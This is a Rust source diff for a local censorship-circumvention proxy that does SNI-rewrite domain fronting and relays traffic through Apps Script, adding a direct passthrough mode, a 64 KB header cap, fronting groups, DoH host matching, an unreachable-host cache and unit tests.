- if rewrite_ctx.mode == Mode::GoogleOnly { + // 3. direct mode: no Apps Script relay exists. Anything that isn't + // SNI-rewrite-matched (Google edge or a configured fronting_group) + // gets raw TCP passthrough so the user's browser still works while + // they're deploying Code.gs. They'd switch to apps_script mode for + // full DPI bypass. + if rewrite_ctx.mode == Mode::Direct { let via = rewrite_ctx.upstream_socks5.as_deref(); tracing::info!( - "dispatch {}:{} -> raw-tcp ({}) (google_only: no relay)", + "dispatch {}:{} -> raw-tcp ({}) (direct mode: no relay)", host, port, via.unwrap_or("direct") @@ -1499,14 +1947,35 @@ fn looks_like_http(first_bytes: &[u8]) -> bool { /// Read an HTTP head (request line + headers) up to the first \r\n\r\n. /// Returns (head_bytes, leftover_after_head). The leftover may contain part /// of the request body already received. -async fn read_http_head(sock: &mut TcpStream) -> std::io::Result, Vec)>> { +/// Maximum size of an HTTP request head (request line + all headers). +/// +/// Set to match upstream Python's `MAX_HEADER_BYTES` (64 KB, +/// masterking32/MasterHttpRelayVPN constants.py). Real browsers +/// virtually never exceed ~16 KB; anything past 64 KB is either a +/// buggy client or a deliberate slowloris-style header bomb. +/// Previously 1 MB, which let a misbehaving client allocate a lot +/// of memory before failing. +const MAX_HEADER_BYTES: usize = 64 * 1024; + +/// Result of `read_http_head` / `read_http_head_io`. +/// `Oversized` is distinct from other I/O errors so the caller can +/// reply with `431 Request Header Fields Too Large` instead of just +/// dropping the connection (which a browser would silently retry, +/// reproducing the same problem). 
+enum HeadReadResult { + Got { head: Vec, leftover: Vec }, + Closed, + Oversized, +} + +async fn read_http_head(sock: &mut TcpStream) -> std::io::Result { let mut buf = Vec::with_capacity(4096); let mut tmp = [0u8; 4096]; loop { let n = sock.read(&mut tmp).await?; if n == 0 { return if buf.is_empty() { - Ok(None) + Ok(HeadReadResult::Closed) } else { Err(std::io::Error::new( std::io::ErrorKind::UnexpectedEof, @@ -1518,13 +1987,10 @@ async fn read_http_head(sock: &mut TcpStream) -> std::io::Result if let Some(pos) = find_headers_end(&buf) { let head = buf[..pos].to_vec(); let leftover = buf[pos..].to_vec(); - return Ok(Some((head, leftover))); + return Ok(HeadReadResult::Got { head, leftover }); } - if buf.len() > 1024 * 1024 { - return Err(std::io::Error::new( - std::io::ErrorKind::InvalidData, - "headers too large", - )); + if buf.len() > MAX_HEADER_BYTES { + return Ok(HeadReadResult::Oversized); } } } @@ -1680,17 +2146,37 @@ async fn do_sni_rewrite_tunnel_from_tcp( port: u16, mitm: Arc>, rewrite_ctx: Arc, + // When Some, overrides the default Google edge target with a + // user-configured fronting group's (ip, sni). `Arc` so the + // dispatcher hands us a refcount-only clone — the resolved + // group also carries the matcher's normalized domain list which + // we don't need here. None = built-in Google edge path. 
+ group: Option>, ) -> std::io::Result<()> { - let target_ip = hosts_override(&rewrite_ctx.hosts, host) - .map(|s| s.to_string()) - .unwrap_or_else(|| rewrite_ctx.google_ip.clone()); + let (target_ip, outbound_sni, server_name) = match &group { + Some(g) => (g.ip.clone(), g.sni.clone(), g.server_name.clone()), + None => { + let ip = hosts_override(&rewrite_ctx.hosts, host) + .map(|s| s.to_string()) + .unwrap_or_else(|| rewrite_ctx.google_ip.clone()); + let sni = rewrite_ctx.front_domain.clone(); + let sn = match ServerName::try_from(sni.clone()) { + Ok(n) => n, + Err(e) => { + tracing::error!("invalid front_domain '{}': {}", sni, e); + return Ok(()); + } + }; + (ip, sni, sn) + } + }; tracing::info!( "SNI-rewrite tunnel -> {}:{} via {} (outbound SNI={})", host, port, target_ip, - rewrite_ctx.front_domain + outbound_sni ); // Accept browser TLS with a cert we sign for `host`. @@ -1734,13 +2220,6 @@ async fn do_sni_rewrite_tunnel_from_tcp( }; let _ = upstream_tcp.set_nodelay(true); - let server_name = match ServerName::try_from(rewrite_ctx.front_domain.clone()) { - Ok(n) => n, - Err(e) => { - tracing::error!("invalid front_domain '{}': {}", rewrite_ctx.front_domain, e); - return Ok(()); - } - }; let outbound = match rewrite_ctx .tls_connector .connect(server_name, upstream_tcp) @@ -1833,8 +2312,31 @@ where S: tokio::io::AsyncRead + tokio::io::AsyncWrite + Unpin, { let (head, leftover) = match read_http_head_io(stream).await? { - Some(v) => v, - None => return Ok(false), + HeadReadResult::Got { head, leftover } => (head, leftover), + HeadReadResult::Closed => return Ok(false), + HeadReadResult::Oversized => { + // Inside MITM: same reasoning as the plaintext path. Return + // 431 over the decrypted stream so the browser surfaces a + // real error to the user instead of looping a connection + // reset, which was the symptom upstream caught (Apps Script + // ate malformed JSON when truncated header blocks were + // forwarded blindly). 
+ tracing::warn!( + "MITM header block exceeds {} bytes — closing ({}:{})", + MAX_HEADER_BYTES, + host, + port + ); + let _ = stream + .write_all( + b"HTTP/1.1 431 Request Header Fields Too Large\r\n\ + Connection: close\r\n\ + Content-Length: 0\r\n\r\n", + ) + .await; + let _ = stream.flush().await; + return Ok(false); + } }; let (method, path, _version, headers) = match parse_request_head(&head) { @@ -1862,7 +2364,7 @@ where // pourya-p's log in #64 showed the real Host header. Match every // subdomain of x.com here. let host_lower = host.to_ascii_lowercase(); - let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com"); + let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com") || host_lower == "twitter.com" || host_lower.ends_with(".twitter.com"); let path = if is_x_com && path.starts_with("/i/api/graphql/") && path.contains("?variables=") { match path.split_once('&') { Some((short, _)) => { @@ -1955,7 +2457,7 @@ where Ok(!connection_close) } -async fn read_http_head_io(stream: &mut S) -> std::io::Result, Vec)>> +async fn read_http_head_io(stream: &mut S) -> std::io::Result where S: tokio::io::AsyncRead + Unpin, { @@ -1965,7 +2467,7 @@ where let n = stream.read(&mut tmp).await?; if n == 0 { return if buf.is_empty() { - Ok(None) + Ok(HeadReadResult::Closed) } else { Err(std::io::Error::new( std::io::ErrorKind::UnexpectedEof, @@ -1977,13 +2479,10 @@ where if let Some(pos) = find_headers_end(&buf) { let head = buf[..pos].to_vec(); let leftover = buf[pos..].to_vec(); - return Ok(Some((head, leftover))); + return Ok(HeadReadResult::Got { head, leftover }); } - if buf.len() > 1024 * 1024 { - return Err(std::io::Error::new( - std::io::ErrorKind::InvalidData, - "headers too large", - )); + if buf.len() > MAX_HEADER_BYTES { + return Ok(HeadReadResult::Oversized); } } } @@ -2203,6 +2702,174 @@ async fn do_plain_http( Ok(()) } +/// `direct` mode plain-HTTP passthrough. 
The CONNECT path already +/// falls through to raw TCP for hosts outside the SNI-rewrite set in +/// `direct`; this is the same idea for the `GET http://…` proxy form +/// so a bare `http://example.com` typed in the address bar doesn't 502. +/// +/// We rewrite the absolute-form request URI (`GET http://host/path`) to +/// origin form (`GET /path`), strip hop-by-hop headers, force +/// `Connection: close` so a keep-alive client can't pipeline a request +/// to a different host onto our spliced socket, then dial the origin +/// (honoring `upstream_socks5` if set) and splice both directions. +async fn do_plain_http_passthrough( + mut sock: TcpStream, + head: &[u8], + leftover: &[u8], + rewrite_ctx: &RewriteCtx, +) -> std::io::Result<()> { + let (method, target, version, headers) = match parse_request_head(head) { + Some(v) => v, + None => return Ok(()), + }; + + let (host, port, path) = match resolve_plain_http_target(&target, &headers) { + Some(v) => v, + None => { + tracing::debug!("plain-http passthrough: cannot parse target {}", target); + return Ok(()); + } + }; + + tracing::info!( + "dispatch http {}:{} -> raw-tcp ({}) (direct mode: no relay)", + host, + port, + rewrite_ctx.upstream_socks5.as_deref().unwrap_or("direct"), + ); + + // Rewrite request line to origin form and drop hop-by-hop headers. 
+ let mut rewritten = Vec::with_capacity(head.len()); + rewritten.extend_from_slice(method.as_bytes()); + rewritten.push(b' '); + rewritten.extend_from_slice(path.as_bytes()); + rewritten.push(b' '); + rewritten.extend_from_slice(version.as_bytes()); + rewritten.extend_from_slice(b"\r\n"); + for (k, v) in &headers { + let kl = k.to_ascii_lowercase(); + if kl == "proxy-connection" || kl == "connection" || kl == "keep-alive" { + continue; + } + rewritten.extend_from_slice(k.as_bytes()); + rewritten.extend_from_slice(b": "); + rewritten.extend_from_slice(v.as_bytes()); + rewritten.extend_from_slice(b"\r\n"); + } + rewritten.extend_from_slice(b"Connection: close\r\n\r\n"); + + let target_host = host.trim_start_matches('[').trim_end_matches(']'); + let connect_timeout = if looks_like_ip(target_host) { + std::time::Duration::from_secs(4) + } else { + std::time::Duration::from_secs(10) + }; + let upstream = if let Some(proxy) = rewrite_ctx.upstream_socks5.as_deref() { + match socks5_connect_via(proxy, target_host, port).await { + Ok(s) => s, + Err(e) => { + tracing::warn!( + "upstream-socks5 {} -> {}:{} failed: {} (falling back to direct)", + proxy, + host, + port, + e + ); + match tokio::time::timeout( + connect_timeout, + TcpStream::connect((target_host, port)), + ) + .await + { + Ok(Ok(s)) => s, + _ => return Ok(()), + } + } + } + } else { + match tokio::time::timeout(connect_timeout, TcpStream::connect((target_host, port))).await { + Ok(Ok(s)) => s, + Ok(Err(e)) => { + tracing::debug!("plain-http connect {}:{} failed: {}", host, port, e); + return Ok(()); + } + Err(_) => { + tracing::debug!("plain-http connect {}:{} timeout", host, port); + return Ok(()); + } + } + }; + let _ = upstream.set_nodelay(true); + + let (mut ar, mut aw) = sock.split(); + let (mut br, mut bw) = upstream.into_split(); + bw.write_all(&rewritten).await?; + if !leftover.is_empty() { + bw.write_all(leftover).await?; + } + let t1 = tokio::io::copy(&mut ar, &mut bw); + let t2 = tokio::io::copy(&mut 
br, &mut aw); + tokio::select! { + _ = t1 => {} + _ = t2 => {} + } + Ok(()) +} + +/// Parse the target of a plain-HTTP proxy request line into +/// `(host, port, origin-form-path)`. Browsers send absolute form +/// (`http://host[:port]/path`); we also accept the origin-form +/// fallback (`/path` with a `Host:` header) for transparent-proxy +/// clients. `https://` is accepted defensively, though browsers route +/// HTTPS through CONNECT and shouldn't hit this path. +fn resolve_plain_http_target( + target: &str, + headers: &[(String, String)], +) -> Option<(String, u16, String)> { + let (rest, default_port) = if let Some(r) = target.strip_prefix("http://") { + (r, 80u16) + } else if let Some(r) = target.strip_prefix("https://") { + (r, 443u16) + } else if target.starts_with('/') { + let host_header = headers + .iter() + .find(|(k, _)| k.eq_ignore_ascii_case("host")) + .map(|(_, v)| v.as_str())?; + let (host, port) = split_authority(host_header, 80); + return Some((host, port, target.to_string())); + } else { + return None; + }; + + let (authority, path) = match rest.find('/') { + Some(i) => (&rest[..i], &rest[i..]), + None => (rest, "/"), + }; + if authority.is_empty() { + return None; + } + let (host, port) = split_authority(authority, default_port); + Some((host, port, path.to_string())) +} + +/// Split an `authority` (`host[:port]`, with optional IPv6 brackets) +/// into a `(host, port)` pair, defaulting the port when absent. +fn split_authority(authority: &str, default_port: u16) -> (String, u16) { + // Bare IPv6 (multiple colons, no brackets) — `rsplit_once(':')` + // would otherwise mangle `::1` into `(":", 1)`. Take the whole + // string as the host and use the default port. 
+ let colons = authority.bytes().filter(|&b| b == b':').count(); + if colons > 1 && !authority.starts_with('[') { + return (authority.to_string(), default_port); + } + if let Some((h, p)) = authority.rsplit_once(':') { + if let Ok(port) = p.parse::() { + return (h.to_string(), port); + } + } + (authority.to_string(), default_port) +} + #[cfg(test)] mod tests { use super::*; @@ -2215,6 +2882,63 @@ mod tests { .collect() } + #[test] + fn resolve_plain_http_target_parses_absolute_form() { + let h = headers(&[]); + let (host, port, path) = + resolve_plain_http_target("http://example.com/", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 80); + assert_eq!(path, "/"); + + let (host, port, path) = + resolve_plain_http_target("http://example.com:8080/foo?x=1", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 8080); + assert_eq!(path, "/foo?x=1"); + + let (host, port, path) = + resolve_plain_http_target("http://example.com", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 80); + assert_eq!(path, "/"); + } + + #[test] + fn resolve_plain_http_target_falls_back_to_host_header() { + let h = headers(&[("Host", "example.com:8080")]); + let (host, port, path) = resolve_plain_http_target("/foo", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 8080); + assert_eq!(path, "/foo"); + } + + #[test] + fn resolve_plain_http_target_rejects_bare_authority() { + // No scheme, doesn't start with `/` — not something we can route. 
+ assert!(resolve_plain_http_target("example.com", &headers(&[])).is_none()); + assert!(resolve_plain_http_target("http://", &headers(&[])).is_none()); + } + + #[test] + fn split_authority_handles_ports_and_ipv6() { + assert_eq!( + split_authority("example.com", 80), + ("example.com".to_string(), 80) + ); + assert_eq!( + split_authority("example.com:8080", 80), + ("example.com".to_string(), 8080) + ); + assert_eq!( + split_authority("[::1]:8080", 80), + ("[::1]".to_string(), 8080) + ); + // Bare IPv6 without brackets — keep the whole string as the host + // and use the default port instead of mis-splitting on a colon. + assert_eq!(split_authority("::1", 80), ("::1".to_string(), 80)); + } + #[test] fn socks5_udp_domain_packet_round_trips() { let mut raw = vec![0, 0, 0, 0x03, 11]; @@ -2366,36 +3090,77 @@ mod tests { #[test] fn youtube_via_relay_routes_youtube_through_relay_path() { - // Issue #102. When youtube_via_relay=true, YouTube suffixes - // must NOT match the SNI-rewrite path, so traffic falls - // through to Apps Script relay. Other Google suffixes are - // unaffected. + // Issue #102 + #275. When youtube_via_relay=true: + // - YouTube API + HTML hosts (where Restricted Mode lives) + // opt out of SNI rewrite so they go through the relay. + // - YouTube image / video / channel-asset CDNs STAY on SNI + // rewrite — Restricted Mode isn't enforced on those, and + // routing video chunks through Apps Script burns quota + // and risks the 6-min execution cap. Pre-#275 ytimg.com + // was incorrectly carved out alongside the API surfaces. + // - Non-YouTube Google suffixes are unaffected by the flag. let hosts = std::collections::HashMap::new(); - // Default behaviour: everything in the pool rewrites. + // Default behaviour (flag off): everything in the SNI pool + // rewrites including all YouTube assets. 
+ assert!(should_use_sni_rewrite(&hosts, "www.youtube.com", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false)); assert!(should_use_sni_rewrite( &hosts, - "www.youtube.com", + "youtubei.googleapis.com", 443, false )); - assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false)); - assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false)); - assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false)); - // With the toggle on: YouTube opts out, Google stays. + // googlevideo.com is INTENTIONALLY NOT in SNI_REWRITE_SUFFIXES + // — see the long note at the top of the SNI list. v1.7.4 tried + // adding it; reverted in v1.7.6 after user reports of total + // YouTube breakage. If the project ever ships an EVA-edge-IP + // config knob, this assertion can flip. Until then, video + // chunks correctly fall through to the Apps Script relay path + // and this assertion guards against a regression. assert!(!should_use_sni_rewrite( &hosts, - "www.youtube.com", + "rr1---sn-abc.googlevideo.com", 443, - true + false )); - assert!(!should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true)); + + // Flag on: only the API + HTML hosts opt out. + assert!(!should_use_sni_rewrite(&hosts, "www.youtube.com", 443, true)); assert!(!should_use_sni_rewrite(&hosts, "youtu.be", 443, true)); + assert!(!should_use_sni_rewrite( + &hosts, + "www.youtube-nocookie.com", + 443, + true + )); + assert!(!should_use_sni_rewrite( + &hosts, + "youtubei.googleapis.com", + 443, + true + )); + + // Flag on: image / channel-asset CDNs STAY on SNI rewrite. Pre-#275 + // ytimg.com was incorrectly carved out alongside the API surfaces. 
+ // googlevideo.com still goes through the relay path (not in the + // SNI list at all — see note above the SNI_REWRITE_SUFFIXES + // entries) so the same flag-on assertion isn't applicable to it. + assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true)); + assert!(should_use_sni_rewrite(&hosts, "yt3.ggpht.com", 443, true)); + + // Flag on: non-YouTube Google suffixes are unaffected. Note + // youtubei.googleapis.com (above) is the *carve-out* — the + // broader googleapis.com suffix is NOT carved out, so e.g. + // Drive / Calendar / etc. continue to SNI-rewrite. assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, true)); + assert!(should_use_sni_rewrite(&hosts, "fonts.gstatic.com", 443, true)); assert!(should_use_sni_rewrite( &hosts, - "fonts.gstatic.com", + "drive.googleapis.com", 443, true )); @@ -2459,4 +3224,152 @@ mod tests { assert!(matches_passthrough("example.com", &list)); assert!(matches_passthrough("example.com.", &list)); } + + #[test] + fn doh_default_list_exact_matches() { + let extra: Vec = vec![]; + assert!(matches_doh_host("chrome.cloudflare-dns.com", &extra)); + assert!(matches_doh_host("dns.google", &extra)); + assert!(matches_doh_host("dns.quad9.net", &extra)); + assert!(matches_doh_host("doh.opendns.com", &extra)); + } + + #[test] + fn doh_default_list_case_insensitive_and_trailing_dot() { + let extra: Vec = vec![]; + assert!(matches_doh_host("DNS.GOOGLE", &extra)); + assert!(matches_doh_host("dns.google.", &extra)); + } + + #[test] + fn doh_default_list_suffix_match_for_tenant_subdomains() { + // `cloudflare-dns.com` is in the default list — Workers-hosted + // tenant DoH endpoints sit under it and should match too. + let extra: Vec = vec![]; + assert!(matches_doh_host("tenant.cloudflare-dns.com", &extra)); + // But a substring match must NOT pass: `xcloudflare-dns.com` is + // a different domain. 
+ assert!(!matches_doh_host("xcloudflare-dns.com", &extra)); + } + + #[test] + fn doh_default_list_unrelated_hosts_do_not_match() { + let extra: Vec = vec![]; + assert!(!matches_doh_host("example.com", &extra)); + assert!(!matches_doh_host("googlevideo.com", &extra)); + assert!(!matches_doh_host("", &extra)); + } + + #[test] + fn doh_extra_list_extends_default() { + let extra = vec![".internal-doh.example".to_string(), "doh.acme.test".to_string()]; + // Defaults still match. + assert!(matches_doh_host("dns.google", &extra)); + // User additions match. + assert!(matches_doh_host("doh.acme.test", &extra)); + assert!(matches_doh_host("a.b.internal-doh.example", &extra)); + // Unrelated still doesn't match. + assert!(!matches_doh_host("example.com", &extra)); + } + + #[test] + fn doh_extra_entries_match_subdomains_without_leading_dot() { + // Asymmetry footgun guard: user adds `doh.acme.test` and expects + // `tenant.doh.acme.test` to match too — same as `dns.google` + // matching `tenant.dns.google` from the default list. Unlike + // `passthrough_hosts`, DoH extras don't require a leading dot. + let extra = vec!["doh.acme.test".to_string()]; + assert!(matches_doh_host("doh.acme.test", &extra)); + assert!(matches_doh_host("tenant.doh.acme.test", &extra)); + // But substring overlap must still be rejected. + assert!(!matches_doh_host("xdoh.acme.test", &extra)); + } + + fn fg(name: &str, sni: &str, domains: &[&str]) -> Arc { + Arc::new( + FrontingGroupResolved::from_config(&FrontingGroup { + name: name.into(), + ip: "127.0.0.1".into(), + sni: sni.into(), + domains: domains.iter().map(|s| s.to_string()).collect(), + }) + .expect("test fronting group should resolve"), + ) + } + + #[test] + fn fronting_group_match_exact_and_suffix() { + let groups = vec![fg("vercel", "react.dev", &["vercel.com", "nextjs.org"])]; + // Exact. + assert_eq!( + match_fronting_group("vercel.com", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Suffix. 
+ assert_eq!( + match_fronting_group("app.vercel.com", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Different member. + assert_eq!( + match_fronting_group("docs.nextjs.org", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Non-member. + assert!(match_fronting_group("example.com", &groups).is_none()); + // Substring overlap is NOT a match (xvercel.com isn't *.vercel.com). + assert!(match_fronting_group("xvercel.com", &groups).is_none()); + } + + #[test] + fn fronting_group_match_case_and_trailing_dot() { + let groups = vec![fg("fastly", "www.python.org", &["reddit.com"])]; + assert_eq!( + match_fronting_group("Reddit.COM", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + assert_eq!( + match_fronting_group("reddit.com.", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + assert_eq!( + match_fronting_group("WWW.Reddit.com.", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + } + + #[test] + fn fronting_group_match_first_wins() { + // When a host is in two groups, the earlier group is chosen. + // Lets users put more-specific groups first. 
+ let groups = vec![ + fg("specific", "a.example", &["api.example.com"]), + fg("broad", "b.example", &["example.com"]), + ]; + assert_eq!( + match_fronting_group("api.example.com", &groups).map(|g| g.name.as_str()), + Some("specific") + ); + assert_eq!( + match_fronting_group("example.com", &groups).map(|g| g.name.as_str()), + Some("broad") + ); + } + + #[test] + fn fronting_group_match_empty_list() { + let groups: Vec> = Vec::new(); + assert!(match_fronting_group("vercel.com", &groups).is_none()); + } + + #[test] + fn fronting_group_resolve_rejects_invalid_sni() { + let bad = FrontingGroup { + name: "bad".into(), + ip: "127.0.0.1".into(), + sni: "not a valid hostname".into(), + domains: vec!["x.com".into()], + }; + assert!(FrontingGroupResolved::from_config(&bad).is_err()); + } } diff --git a/src/test_cmd.rs b/src/test_cmd.rs index a9007a8d..b87c7fdd 100644 --- a/src/test_cmd.rs +++ b/src/test_cmd.rs @@ -20,10 +20,10 @@ use crate::domain_fronter::DomainFronter; const TEST_URL: &str = "https://api.ipify.org/?format=json"; pub async fn run(config: &Config) -> bool { - if matches!(config.mode_kind(), Ok(Mode::GoogleOnly)) { + if matches!(config.mode_kind(), Ok(Mode::Direct)) { let msg = "`mhrv-rs test` probes the Apps Script relay, which isn't \ - wired up in google_only mode. Run `mhrv-rs test-sni` to \ - check the direct SNI-rewrite tunnel instead."; + wired up in direct mode. Run `mhrv-rs test-sni` to check \ + the SNI-rewrite tunnel instead."; println!("{}", msg); tracing::error!("{}", msg); return false; @@ -35,7 +35,7 @@ pub async fn run(config: &Config) -> bool { // back as the Apps Script datacenter — confusing because it // disagreed with what whatismyipaddress.com showed in the // browser (which DOES go through the tunnel). Rather than fake - // a passing test, refuse the same way we do for google_only and + // a passing test, refuse the same way we do for direct mode and // tell the user how to actually verify Full mode. 
let msg = "`mhrv-rs test` is wired only for the apps_script relay \ path. In full mode the data plane is the pipelined \ diff --git a/src/tunnel_client.rs b/src/tunnel_client.rs index 72444e60..c3444a44 100644 --- a/src/tunnel_client.rs +++ b/src/tunnel_client.rs @@ -14,7 +14,7 @@ use std::collections::HashMap; // reason; reuse it here. `AtomicBool` works fine in std on every target. use portable_atomic::AtomicU64; use std::sync::atomic::{AtomicBool, Ordering}; -use std::sync::Arc; +use std::sync::{Arc, Mutex}; use std::time::{Duration, Instant}; use base64::engine::general_purpose::STANDARD as B64; @@ -23,7 +23,7 @@ use tokio::io::{AsyncReadExt, AsyncWrite, AsyncWriteExt}; use tokio::net::TcpStream; use tokio::sync::{mpsc, oneshot, Semaphore}; -use crate::domain_fronter::{BatchOp, DomainFronter, TunnelResponse}; +use crate::domain_fronter::{BatchOp, DomainFronter, FronterError, TunnelResponse}; /// Apps Script allows 30 concurrent executions per account / deployment. const CONCURRENCY_PER_DEPLOYMENT: usize = 30; @@ -38,10 +38,11 @@ const MAX_BATCH_PAYLOAD_BYTES: usize = 4 * 1024 * 1024; /// serializing too many sessions behind a single HTTP round-trip. const MAX_BATCH_OPS: usize = 50; -/// Timeout for a single batch HTTP round-trip. If the tunnel-node or Apps -/// Script takes longer than this, the batch fails and sessions get error -/// replies rather than hanging forever. -const BATCH_TIMEOUT: Duration = Duration::from_secs(30); +// Per-batch HTTP round-trip timeout is now read from +// `DomainFronter::batch_timeout()`, sourced from `Config::request_timeout_secs` +// (#430, masterking32 PR #25). The historical default — 30 s, matching Apps +// Script's typical response cliff — lives in `default_request_timeout_secs` +// in `config.rs`. /// Timeout for a session waiting for its batch reply. If the batch task /// is slow (e.g. 
one op in the batch has a dead target on the tunnel-node @@ -55,6 +56,12 @@ const REPLY_TIMEOUT: Duration = Duration::from_secs(35); /// connect saves one Apps Script round-trip per new flow. const CLIENT_FIRST_DATA_WAIT: Duration = Duration::from_millis(50); +/// Adaptive coalesce defaults: after each new op arrives, wait another +/// step for more ops. Resets on every arrival, up to max from the first +/// op. Overridable via config `coalesce_step_ms` / `coalesce_max_ms`. +const DEFAULT_COALESCE_STEP_MS: u64 = 40; +const DEFAULT_COALESCE_MAX_MS: u64 = 1000; + /// Structured error code the tunnel-node returns when it doesn't know the /// op (version mismatch). Must match `tunnel-node/src/main.rs`. const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; @@ -68,6 +75,28 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; /// floor, so network jitter on either side won't false-trigger. const LEGACY_DETECT_THRESHOLD: Duration = Duration::from_millis(1500); +/// How long a deployment stays in "legacy / no long-poll" mode after the +/// last detection. Must be much longer than `LEGACY_DETECT_THRESHOLD` so a +/// freshly-marked deployment doesn't immediately self-recover, but short +/// enough that a redeployed / recovered tunnel-node gets re-probed without +/// requiring a process restart. 60 s lets one stuck deployment widen its +/// own poll cadence without poisoning the others, and self-resets so an +/// upgraded tunnel-node returns to the long-poll fast path on its own. +const LEGACY_RECOVER_AFTER: Duration = Duration::from_secs(60); + +/// How long to remember a `Network is unreachable` / `No route to host` +/// failure for a given `(host, port)`. While cached, the proxy short-circuits +/// repeat CONNECTs with an immediate "host unreachable" reply instead of +/// burning a 1.5–2s tunnel batch round-trip on a target that just failed. +/// Real motivator: IPv6-only probe hostnames (e.g. 
`ds6.probe.*`) on devices +/// without IPv6 — the OS retries the probe every ~1.5s for 10s+, generating +/// 5–10 wasted tunnel sessions per probe. +const UNREACHABLE_CACHE_TTL: Duration = Duration::from_secs(30); + +/// Hard cap on negative-cache size. Browsing pulls in dozens of distinct +/// hosts; we don't want a runaway map. Pruned opportunistically on insert. +const UNREACHABLE_CACHE_MAX: usize = 256; + /// Ports where the *server* speaks first (SMTP banner, SSH identification, /// POP3/IMAP greeting, FTP banner). On these, waiting for client bytes /// gains nothing and just adds handshake latency — skip the pre-read. @@ -77,10 +106,44 @@ fn is_server_speaks_first(port: u16) -> bool { matches!(port, 21 | 22 | 25 | 80 | 110 | 143 | 587) } +/// Recognize the tunnel-node's connect-error strings that mean +/// "this destination is fundamentally unreachable from the tunnel-node's +/// network right now" — distinct from refused/reset/timeout, which can be +/// transient. These come through as the inner `e` of a `TunnelResponse` +/// after the tunnel-node's std::io::Error is stringified, so we match on +/// substrings rather than `ErrorKind`. Linux: errno 101 (ENETUNREACH), +/// errno 113 (EHOSTUNREACH). Format varies a bit across libc/Tokio +/// versions, so cover both the human text and the os-error tag. +fn is_unreachable_error_str(s: &str) -> bool { + let lc = s.to_ascii_lowercase(); + lc.contains("network is unreachable") + || lc.contains("no route to host") + || lc.contains("os error 101") + || lc.contains("os error 113") +} + +/// Canonicalize a host string for use as a negative-cache key. DNS names +/// are case-insensitive and may carry a trailing root-label dot, so +/// `Example.COM:443`, `example.com:443`, and `example.com.:443` are all the +/// same destination. IPv4 / IPv6 literals are unaffected — IPv4 has no +/// letters, and `Ipv6Addr::to_string()` already emits lowercase. 
+fn normalize_cache_host(host: &str) -> String { + let trimmed = host.strip_suffix('.').unwrap_or(host); + trimmed.to_ascii_lowercase() +} + // --------------------------------------------------------------------------- // Multiplexer // --------------------------------------------------------------------------- +/// Reply payload for ops that go through `fire_batch`. The `String` is the +/// `script_id` of the deployment that processed the batch — needed by +/// `tunnel_loop`'s legacy-detection and per-deployment skip-when-idle +/// decisions, which can't reach `fire_batch`'s local `script_id` any +/// other way. Plain `Connect` doesn't go through `fire_batch` and keeps +/// the simpler reply type. +type BatchedReply = oneshot::Sender>; + enum MuxMsg { Connect { host: String, @@ -93,23 +156,23 @@ enum MuxMsg { // Arc so the caller can hand the buffer to the mux AND keep a ref // for the fallback path without an extra 64 KB copy per session. data: Arc>, - reply: oneshot::Sender>, + reply: BatchedReply, }, Data { sid: String, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, UdpOpen { host: String, port: u16, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, UdpData { sid: String, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, Close { sid: String, @@ -122,16 +185,48 @@ pub struct TunnelMux { /// `connect_data` as unsupported. Subsequent sessions skip the /// optimistic path entirely and go straight to plain connect + data. connect_data_unsupported: Arc, - /// Set to `true` after we observe an empty poll round-trip that - /// returned in less than `LEGACY_DETECT_THRESHOLD` with no data. - /// On a long-poll-capable tunnel-node, an empty poll either returns - /// quickly *with data* (push arrived) or holds open until the - /// server's `LONGPOLL_DEADLINE`. 
A fast empty reply means the server - /// is doing the legacy fixed-sleep drain — in that mode, hammering - /// idle sessions at the new 500 ms cadence wastes Apps Script quota - /// for no benefit, so the loop reverts to the pre-long-poll - /// "skip empty polls when idle" behavior. - server_no_longpoll: Arc, + /// Per-deployment legacy state: `script_id` → time it was last + /// observed serving an empty poll faster than `LEGACY_DETECT_THRESHOLD`. + /// Absence means "long-poll capable, or untested." Entries expire after + /// `LEGACY_RECOVER_AFTER` so a redeployed / recovered tunnel-node + /// rejoins the long-poll fast path without requiring a process restart. + /// + /// Note: the per-deployment marks here do *not* drive a per-deployment + /// poll cadence — the `tunnel_loop` cadence (read-timeout backoff and + /// skip-empty-when-idle) is gated on the aggregate `all_legacy`, + /// because the next op's deployment is chosen later by + /// `next_script_id()` round-robin and the loop can't pre-select. What + /// the per-deployment design *does* fix vs the old single AtomicBool: + /// * one slow / legacy deployment can no longer flip the aggregate + /// true on its own — every deployment has to be marked first; + /// * deployments recover individually on the TTL, so an upgraded + /// tunnel-node lifts the aggregate without needing the others to + /// also recover or the process to restart; + /// * the warn log fires once per (deployment, recovery cycle), so + /// re-detection after recovery is a real signal in the logs. + /// The cost: legacy deployments still receive fast empty polls in + /// mixed mode (round-robin doesn't know to avoid them). Worth it to + /// keep pushed bytes flowing through the long-poll-capable peers. + legacy_deployments: Mutex>, + /// Lock-free hot-path snapshot of "every known deployment is currently + /// in legacy mode." 
